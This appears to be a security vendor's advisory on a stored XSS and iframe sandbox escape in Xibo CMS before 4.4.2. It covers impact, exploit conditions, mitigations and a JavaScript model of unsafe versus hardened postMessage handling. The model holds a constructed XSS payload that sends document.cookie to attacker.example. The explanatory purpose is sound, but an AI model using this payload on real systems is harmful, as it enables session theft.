CVE-2026-42558: Xibo Vulnerable to Stored XSS and Iframe Sandbox Escape via Data Connector Script in DataSet
Xibo is an open source digital signage platform with a web content management system and Windows display player software. Prior to 4.4.2, a vulnerability chain consisting of Stored XSS and an iframe sandbox escape in the Xibo CMS allows users with DataSet permissions to use the Data Connector functionality to craft messages which escape the sandbox and facilitate XSS. Exploitation is possible on behalf of an authorized user who has both of the following privileges, which are not granted to non-admins as standard:
- Include "Add DataSet" button to allow for additional DataSets to be created independently to Layouts
Users should upgrade to version 4.4.2, which fixes this issue; upgrading to a fixed version is necessary to remediate. Users unable to upgrade should revoke these privileges from users they do not trust.
Metrics
- CVSS v3.1: 7.6
- Severity: HIGH
- Fixed in: 4.4.2
- Affected Products: 1
HarborGuard Analysis
Synopsis
Stored cross-site scripting (XSS) combined with an iframe sandbox escape affects Xibo CMS, the web-based content management component of the Xibo digital signage platform. An attacker who holds a low-privilege account with the DataSet privileges named in the advisory can reach the vulnerable functionality over the network, craft a malicious Data Connector script in a DataSet, and trigger execution when another authorized user views the affected content. The sandbox confines what runs inside the connector's frame, but messages crafted by that script are handled by the CMS page outside the frame, so the injected script runs in the victim's CMS origin. Successful exploitation reads data available to script in the victim's browser session and makes limited modifications to page content within the victim's context, matching the C:H/I:L/A:N impact of the CVSS vector. The upstream fix is xibo-cms 4.4.2.
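The trust boundary described above, as an added model that is not Xibo's code and does not reproduce the actual Data Connector implementation: a sandboxed iframe can only talk to its parent through postMessage, and the escape happens when the parent renders that message text as markup. The window stand-ins, the message shape, `renderMessageUnsafe`/`renderMessageSafe`, and the `attacker.example` host are assumptions for the illustration; the script runs under Node without a DOM.

```javascript
// Added model of the sandbox trust boundary, not code from Xibo. A sandboxed
// iframe runs untrusted script (think: a DataSet Data Connector) and its only
// channel to the parent page is postMessage. The sandbox attribute constrains
// what runs *inside* the frame; it says nothing about what the parent does with
// the bytes it receives. A parent that drops message text into innerHTML turns
// the message into live markup in the parent's origin, which is the escape
// pattern the advisory describes. Message shape and all names are assumptions.

// Stand-ins for window objects so this runs under Node without a DOM (constructed).
const connectorFrame = { name: "connector-frame" }; // the iframe's contentWindow
const someOtherWindow = { name: "unrelated-window" }; // any other window that can post

// Constructed attacker payload: executes in the parent if rendered as HTML.
const PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// What a "message" event handler sees. A sandboxed frame without
// allow-same-origin has an opaque origin, so event.origin is the string "null"
// and cannot identify the sender; compare event.source to the known frame instead.
const fromConnector = { source: connectorFrame, origin: "null", data: { type: "status", text: PAYLOAD } };
const spoofed = { source: someOtherWindow, origin: "null", data: { type: "status", text: "hello" } };

// Minimal HTML escaping for the five characters that matter in text content.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) =>
    ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" })[c]);
}

// Vulnerable parent: whatever the frame sends becomes live HTML.
// Returned as a string here; in a page this would be `statusEl.innerHTML = ...`.
function renderMessageUnsafe(event) {
  return `<div class="connector-status">${event.data.text}</div>`;
}

// Hardened parent: accept only the known frame, validate the message shape,
// and treat text as text (in a page, prefer `statusEl.textContent = text`).
function renderMessageSafe(event, trustedSource) {
  if (event.source !== trustedSource) return null;
  const d = event.data;
  if (!d || typeof d !== "object" || d.type !== "status" || typeof d.text !== "string") return null;
  return `<div class="connector-status">${escapeHtml(d.text)}</div>`;
}

console.log("unsafe:", renderMessageUnsafe(fromConnector));
console.log("safe:  ", renderMessageSafe(fromConnector, connectorFrame));
console.log("spoof: ", renderMessageSafe(spoofed, connectorFrame));
```

The point for a reviewer of any sandbox-plus-postMessage design is that the `sandbox` attribute is not a control on the parent's side of the channel; the parent's handler is the real boundary and must validate the sender, the schema, and the rendering path. A Content Security Policy on the CMS page that forbids inline script would additionally blunt the `onerror` payload above, but it does not replace fixing the handler.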
HarborGuard Coverage
- Detection (Available): Detection of CVE-2026-42558 is active across every HarborGuard environment. The CVE is ingested from upstream advisory feeds shortly after publication and matched against all customer images, including custom-built Xibo CMS images, in both registry scans and CI pipeline checks.
- Scoring (Available): HarborGuard scores this CVE at 7.6 HIGH using its CVSS v3.1 vector and weights findings against each customer's configured compliance policy, routing alerts to the appropriate team inbox based on severity thresholds and asset ownership rules defined within that environment.
- Patched-image rebuild (Pending upstream): The advisory names xibo-cms 4.4.2 as the fixed version. HarborGuard re-evaluates the advisory on every ingest cycle; once the fixed release is matched by the ingest, a patched-image rebuild becomes available automatically, and customers with auto-remediation enabled receive the rebuild, a regression test run, and a PR opened against affected workloads without manual intervention.
Exploit Conditions
- Network reachability: Required
The attacker must reach the Xibo CMS web interface over the network to submit the malicious DataSet payload.
- Authentication: Required
The attacker must hold a valid low-privilege account that an administrator has granted the DataSet privileges named in the advisory (including the "Add DataSet" button); these are not granted to non-admins by default.
- Victim interaction: Required
A separate authorized user must view or interact with the crafted DataSet content to trigger the XSS and sandbox escape in their browser session.
- Attack complexity: Low
Once the attacker holds the required privileges, exploitation does not depend on race conditions or special environmental factors; the only remaining condition is the victim interaction above.
Blast Radius
- Reads page content within the victim's authenticated CMS context and any session material exposed to script, for example cookies not flagged HttpOnly or tokens held in page state.
- Performs limited modifications to content rendered in the victim's browser through the escaped iframe sandbox.
- Issues requests to the Xibo CMS on behalf of the victim, with the victim's privileges, for the duration of the session.
How HarborGuard Handles This
Available on HarborGuard: scanning for CVE-2026-42558 is active, and any image containing an affected version of xibo-cms (prior to 4.4.2) is flagged in scan results and pipeline checks. The upstream fix is xibo-cms 4.4.2; HarborGuard re-checks the advisory every ingest cycle and makes a patched-image rebuild available once the fixed release is matched. For customers with auto-remediation enabled, the rebuild, regression test run, and PR against affected workloads are triggered automatically at that point. In the interim, compensating controls available for consideration include: restricting the "Add DataSet" and DataSet management privileges to fully trusted administrator accounts (as recommended by the Xibo project); applying network policy to limit which internal principals can reach the Xibo CMS interface; and reviewing existing DataSets and their Data Connector scripts for injected content, since an upgrade fixes the rendering path but does not remove content an attacker has already stored. HarborGuard surfaces any policy-violation findings against your configured compliance rules as advisory-linked alerts in the affected environment's inbox.
- xibosignage/xibo-cms: < 4.4.2
CVSS v3.1 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N